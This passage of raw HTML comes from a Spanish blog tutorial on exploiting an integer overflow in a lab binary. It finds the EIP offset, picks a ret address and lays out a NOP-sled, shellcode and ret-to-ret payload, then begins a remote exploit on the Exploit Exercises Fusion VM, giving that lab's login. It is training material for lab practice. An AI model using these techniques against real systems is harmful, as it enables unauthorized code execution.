&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI_9wxXi5PC23052i4avZsA68IKaG4CTJQoIL6lPY20BedWKB9RL2_iBqB8_79ODR2uat53ziEAgaV5VgIf7Z2AY1esjXOp6goxfkcln60_HGRlFgl3orfzFjdhGvhpoFQRhsLKOTteZM/s1600/gdb2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;106&quot; data-original-width=&quot;1288&quot; height=&quot;52&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI_9wxXi5PC23052i4avZsA68IKaG4CTJQoIL6lPY20BedWKB9RL2_iBqB8_79ODR2uat53ziEAgaV5VgIf7Z2AY1esjXOp6goxfkcln60_HGRlFgl3orfzFjdhGvhpoFQRhsLKOTteZM/s640/gdb2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ejecutamos, vemos donde está el error y lo metemos en patternPetater:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtU1IxjChxzUb153j-aIammOYcjRHDVjpTSue86QEZjxu5hLd54Y1T2fP22bwZXYzUk02ymXcVAoaRltPxUHANXEK-QQQ2PvSal5W2OVmqPdPPvJeaO93IXCVVDUHMMTaTjlmzjUlSgAM/s1600/gdb3.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;295&quot; data-original-width=&quot;531&quot; height=&quot;354&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtU1IxjChxzUb153j-aIammOYcjRHDVjpTSue86QEZjxu5hLd54Y1T2fP22bwZXYzUk02ymXcVAoaRltPxUHANXEK-QQQ2PvSal5W2OVmqPdPPvJeaO93IXCVVDUHMMTaTjlmzjUlSgAM/s640/gdb3.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwFjEhCLSCSsqAKAQlI6MFjsbMbt0GrMC7T5_gb2Hljl21zXusABcG4_Lo64BW4o41i6fwGkEWbMGYdEoEuoP5tiVmIl3afwELbkr_gAm2dsx6QZChV2pESfCNhEKmsqKN_SlIPSZU1ac/s1600/patternpetater2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;138&quot; data-original-width=&quot;878&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwFjEhCLSCSsqAKAQlI6MFjsbMbt0GrMC7T5_gb2Hljl21zXusABcG4_Lo64BW4o41i6fwGkEWbMGYdEoEuoP5tiVmIl3afwELbkr_gAm2dsx6QZChV2pESfCNhEKmsqKN_SlIPSZU1ac/s640/patternpetater2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Como vemos, PatternPetater nos dice que el máximo de bytes que acepta nuestro programa es 276, a partir de ahí sobreescribimos EIP.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ahora tenemos que saber, una dirección donde se encuentre una instrucción ret para realizar el &quot;ret to ret&quot;. Para esto usaremos objdump:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwHln8vn_YD-ctfbiwJJd9e2XcgoZPU442PBkszWxgmKmNrd0wR3uWLS_sU3llKhV7D5fYDK9Kil9t3M4zEF7yW0xPQedmFoiJUksGAaHgVJ7LaLhwH9Bd5Cfej6BmflYH2nayVz0403I/s1600/objdump1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;79&quot; data-original-width=&quot;920&quot; height=&quot;54&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwHln8vn_YD-ctfbiwJJd9e2XcgoZPU442PBkszWxgmKmNrd0wR3uWLS_sU3llKhV7D5fYDK9Kil9t3M4zEF7yW0xPQedmFoiJUksGAaHgVJ7LaLhwH9Bd5Cfej6BmflYH2nayVz0403I/s640/objdump1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Bajaremos hasta la sección &amp;lt;func&amp;gt;, y cogeremos mismo el ret de la función:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMbAr7JCJ593NkU69ZTHYeZUyq38PQwmczhWe1VJw_dMBvdGhUjLe0CTdVbU4cNulOqnMqm1H1avzty5oTSK62MzvA5WHFo7terIkaPXQXtjjEtf51oZgY4um58vQRbPW1R6mMLJTdus/s1600/objdump2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;128&quot; data-original-width=&quot;652&quot; height=&quot;124&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMbAr7JCJ593NkU69ZTHYeZUyq38PQwmczhWe1VJw_dMBvdGhUjLe0CTdVbU4cNulOqnMqm1H1avzty5oTSK62MzvA5WHFo7terIkaPXQXtjjEtf51oZgY4um58vQRbPW1R6mMLJTdus/s640/objdump2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Cogemos entonces la dirección de eres ret: 0x080485ba&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ahora tenemos que montar el payload:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 276 bytes&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4 bytes EIP&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Argumentos&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;\x90shellcodeeeeeeeeeeeeeeeeeeeeeeeeeeeee&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;amp;ret&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;amp;shellcode&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Para montarnos este programa, podemos usar nuestro querido lenguaje de programación: Python&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ya tenemos todo menos el shellcode, podemos escoger uno de los que hemos visto en todos estos posts, mi preferido es Aleph1 No Null:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvm6osOgqOMYvhDsdJ4sL7YdU_UxZi0mSdLCmu_syeRrpRmW0IYfiq-GlopnzL7ShCOIEFuyhLmKyLUOGe6eBR-Ks_lmyrFeWFFW8NRmVtPChvDIrd1tmYcKOy8GxBsPSIOuMuZ9ZLVSk/s1600/exploit.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;549&quot; data-original-width=&quot;996&quot; height=&quot;352&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvm6osOgqOMYvhDsdJ4sL7YdU_UxZi0mSdLCmu_syeRrpRmW0IYfiq-GlopnzL7ShCOIEFuyhLmKyLUOGe6eBR-Ks_lmyrFeWFFW8NRmVtPChvDIrd1tmYcKOy8GxBsPSIOuMuZ9ZLVSk/s640/exploit.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Ya tenemos nuestro exploit montado, como vemos el payload son los argumentos, el -1 con un relleno de NOPS para que nada falle, el shellcode, y para sobreescribir EIP, la dirección a un ret. Vamos a ver la ejecución a ver que obtenemos:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKx8YQYHgyqSBqUJXTEf-uMS2duS6ju6vNUmK3IRowYcHD-_JKeZk6SSY-m60wFhCa7dHELrw7ZnDNNNthPZYB0cD1n4BIpDn5itrOKV1A5ZlLcjCXyqRNr4plJHSQeD4R5DGUAtTrcTw/s1600/explotado.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;362&quot; data-original-width=&quot;1030&quot; height=&quot;224&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKx8YQYHgyqSBqUJXTEf-uMS2duS6ju6vNUmK3IRowYcHD-_JKeZk6SSY-m60wFhCa7dHELrw7ZnDNNNthPZYB0cD1n4BIpDn5itrOKV1A5ZlLcjCXyqRNr4plJHSQeD4R5DGUAtTrcTw/s640/explotado.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vamos a ver un poco que pasa a bajo nivel, para ello usaremos nuestro debugger favorito para Linux: edb debugger. Meteremos en python el mismo os.system pero de la siguiente manera:&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;os.system(&#39;edb --run ./integer2 &#39;+payload)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Y veremos un poco lo que tenemos:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqTRB5U2gCNoRsxU4CA1aSqMXu6VtuhYhMmdPiEAjm3EjbEEaCwiCopulou7aVGd-oc5jb2HljOrHNgy69sbh0jtAgQsBejuf2HVLcc-WJJIiD-IGgFDD8C6eOIYvzLQg5pTgGuI37-oo/s1600/edb1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;584&quot; data-original-width=&quot;1219&quot; height=&quot;306&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqTRB5U2gCNoRsxU4CA1aSqMXu6VtuhYhMmdPiEAjm3EjbEEaCwiCopulou7aVGd-oc5jb2HljOrHNgy69sbh0jtAgQsBejuf2HVLcc-WJJIiD-IGgFDD8C6eOIYvzLQg5pTgGuI37-oo/s640/edb1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Tenemos el cargador del ejecutable de Linux, tenemos que pulsar F9, para que vaya al código de main:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD1lpPh_7PqZiwrZC9YNcCrCUL2-_NOlmyLbeuam4D9k0oQXfdnszRrZnuBK-BUFnrPjyTMXa6BqS4XPpfL_LMckg1DKgjVZSpz89MiJpU2PqdKXTFQXlsaVMpg6-bGoDeAnb789iRtt0/s1600/edb2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;588&quot; data-original-width=&quot;1219&quot; height=&quot;308&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD1lpPh_7PqZiwrZC9YNcCrCUL2-_NOlmyLbeuam4D9k0oQXfdnszRrZnuBK-BUFnrPjyTMXa6BqS4XPpfL_LMckg1DKgjVZSpz89MiJpU2PqdKXTFQXlsaVMpg6-bGoDeAnb789iRtt0/s640/edb2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ya estamos en main, ahora pulsaremos F8, hasta llegar al call del func:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNEQYtOGv4F5jLagsB1nfGGuO-K83uj5XkZg9-gapA7vMdkC8klRXr9ynOvieg3S6vkM2kIfXb9xEhccSnpX2i6oUz7cKtcbgAFV7PqajRb9SNPka2pU0iet17br82Y8B8nELKb4-nMfA/s1600/edb3.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;596&quot; data-original-width=&quot;1204&quot; height=&quot;316&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNEQYtOGv4F5jLagsB1nfGGuO-K83uj5XkZg9-gapA7vMdkC8klRXr9ynOvieg3S6vkM2kIfXb9xEhccSnpX2i6oUz7cKtcbgAFV7PqajRb9SNPka2pU0iet17br82Y8B8nELKb4-nMfA/s640/edb3.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vemos abajo a la derecha, la pila, como ya dije, el primer parámetro (más arriba en la pila, pues se pasaban de derecha a izquierda), es el puntero a la cadena con nuestro shellcode, para verlo mejor, vamos a ver cómo lo hacemos:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjzT4VhujmpdMoX7Xc__3gBqjyhP-0EXC2FoUP74aYbROyN0ldRDZ3FSkHKoa11BQwczfPpwOsmRaSc9PmbgXdETEKmM6mVvhskYwAnybwhr4AQA_70EHrft2a1YvGq1K1OlT7TT60mpY/s1600/edb4.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;223&quot; data-original-width=&quot;441&quot; height=&quot;201&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjzT4VhujmpdMoX7Xc__3gBqjyhP-0EXC2FoUP74aYbROyN0ldRDZ3FSkHKoa11BQwczfPpwOsmRaSc9PmbgXdETEKmM6mVvhskYwAnybwhr4AQA_70EHrft2a1YvGq1K1OlT7TT60mpY/s400/edb4.JPG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Ponemos el ratón encima del valor más arriba (bf84aed6) click izquierda y luego, pulsamos click derecho y damos a &quot;Follow Address in dump&quot;, y vemos que el dump de memoria de abajo a la izquierda se ha modificado:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTxDLL4YadHNZZQSDevabFQruJVUCbxkV6U1cFutCb0KlTSXu2q8LaCFbuHDH9Ec0wcp2SyPoLLWJieo-okEDMaM2pcaR8WYuQAq7GzvhECGfXdkoD7k-NYViXrVVQG_E86iW31INm9eQ/s1600/edb5.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;152&quot; data-original-width=&quot;527&quot; height=&quot;184&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTxDLL4YadHNZZQSDevabFQruJVUCbxkV6U1cFutCb0KlTSXu2q8LaCFbuHDH9Ec0wcp2SyPoLLWJieo-okEDMaM2pcaR8WYuQAq7GzvhECGfXdkoD7k-NYViXrVVQG_E86iW31INm9eQ/s640/edb5.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Como vemos, es nuestra cama de NOPs que nosotros pusimos, con F7, entramos a la función, y vamos a pulsar F8 hasta llegar al &quot;ret&quot; de la función:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_ujXFa7zu2kR8n7HaKhBuXn0N7NHvZP42W4Todb-8jegf5NXQHZ40kDDwJtEt68J57carZJuK_U4SlQhvDAn5-MxRorEh1sLWcOSFPJ9wY17W8SvbZ17LQ-w1N8rQS6sXLQvY6MvrOU/s1600/edb6.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;333&quot; data-original-width=&quot;1220&quot; height=&quot;174&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_ujXFa7zu2kR8n7HaKhBuXn0N7NHvZP42W4Todb-8jegf5NXQHZ40kDDwJtEt68J57carZJuK_U4SlQhvDAn5-MxRorEh1sLWcOSFPJ9wY17W8SvbZ17LQ-w1N8rQS6sXLQvY6MvrOU/s640/edb6.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;En la pila se puede ver, que donde debería haber un valor de EIP, de retorno, se encuentra el valor que hemos metido con la dirección de ret, seguido tenemos la dirección donde empieza nuestro shellcode, si pulsamos F8 dos veces saltaremos directamente después de un ret y otro ret a nuestra shellcode:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTGs8WCiTPNRQRO-wmvGetV3GEas4S-pWtiSS6jr0ppLGqnXpIsmVKWwKtkFRVZbSXaM0fWX0GgzNUeezEtA4eSApKlAdOZI7D8EFdTIvE2dXjTwA9wivBWLuNMf_v6HfVRUEdRupbIU/s1600/edb7.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;361&quot; data-original-width=&quot;842&quot; height=&quot;274&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTGs8WCiTPNRQRO-wmvGetV3GEas4S-pWtiSS6jr0ppLGqnXpIsmVKWwKtkFRVZbSXaM0fWX0GgzNUeezEtA4eSApKlAdOZI7D8EFdTIvE2dXjTwA9wivBWLuNMf_v6HfVRUEdRupbIU/s640/edb7.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Si pulsamos F9, se ejecutará el shellcode completo y en la shell de edb debugger, tendremos nuestra propia shell. Pero si lo probamos, serámejor en bash de Linux.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Con esto hemos visto, como explotar una vulnerabilidad de Integer Overflow. Pasemos entonces a un exploit remoto:&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;b&gt;exploit remoto&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Para realizar la tarea de exploit remoto, usaremos una máquina virtual conocida como fusión de exploit exercises (se puede descargar a partir de un enlace mostrado en esta página:&amp;nbsp;&lt;a href=&quot;https://exploit-exercises.com/download/&quot; target=&quot;_blank&quot;&gt;https://exploit-exercises.com/download/&lt;/a&gt;&lt;b&gt;).&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Dentro de esta máquina haremos el ejercicio &quot;level01&quot;, explicaré un poco el código en C, ya que es un poco complejo, explicaré el método principal:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP4TG0DpLUsVgJRKVnPXbVgBlokwhPK_nStEnQX_NuG7_4m7JA7B7OfBWTDYygkjR5CS_mWWJo7xo44SjrJfTj08O5yI7lrVMCXOj3jw_K6txDm13i8yD7pb3NKhRdwovEQWpRo0Pwpv4/s1600/level01.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;604&quot; data-original-width=&quot;772&quot; height=&quot;500&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP4TG0DpLUsVgJRKVnPXbVgBlokwhPK_nStEnQX_NuG7_4m7JA7B7OfBWTDYygkjR5CS_mWWJo7xo44SjrJfTj08O5yI7lrVMCXOj3jw_K6txDm13i8yD7pb3NKhRdwovEQWpRo0Pwpv4/s640/level01.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Principalmente, se busca una cadena que empiece por &quot;GET &quot;, seguido tenga una ruta válida (nostros meteremos una ruta con una barra &#39;/&#39;), y finalmente la cadena HTTP/1.1, tras esto es posible introducir más caracteres.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vamos entonces a arrancar la máquina fusión y loguearnos como &quot;fusion&quot; contraseña &quot;godmode&quot;.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Para intentar debuggear nuestro programa para ver como explotarlo, tenemos que encontrar su PID para usar gdb:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3HBlik23zksPRggYL-Ll7R1M7norfBIhCgJZRRRSdfRCs8TUWReJRAu5hokmNgHGrE9g0qB11IsOVetoTAqGYub38cbfanLErDYDDG5BiWJsaDC6HHv0I0IVA1wuUXCA5sG3BLuFw_64/s1600/os.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;40&quot; data-original-width=&quot;426&quot; height=&quot;60&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3HBlik23zksPRggYL-Ll7R1M7norfBIhCgJZRRRSdfRCs8TUWReJRAu5hokmNgHGrE9g0qB11IsOVetoTAqGYub38cbfanLErDYDDG5BiWJsaDC6HHv0I0IVA1wuUXCA5sG3BLuFw_64/s640/os.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
